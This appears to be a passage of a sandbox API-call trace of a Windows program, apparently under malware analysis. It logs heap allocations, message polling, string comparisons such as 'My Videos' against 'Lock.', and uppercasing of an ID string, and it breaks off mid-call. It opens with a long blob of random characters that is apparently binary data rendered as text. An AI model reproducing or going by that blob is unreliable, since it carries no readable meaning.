lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.878] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0223.878] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.878] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0223.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0223.879] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0223.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0223.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0223.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0223.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.881] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0223.881] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x29f7878 [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x2a683a8 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab608 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0223.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0223.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0223.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0223.884] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0223.884] HeapFree (in: hHeap=0x2af0000, 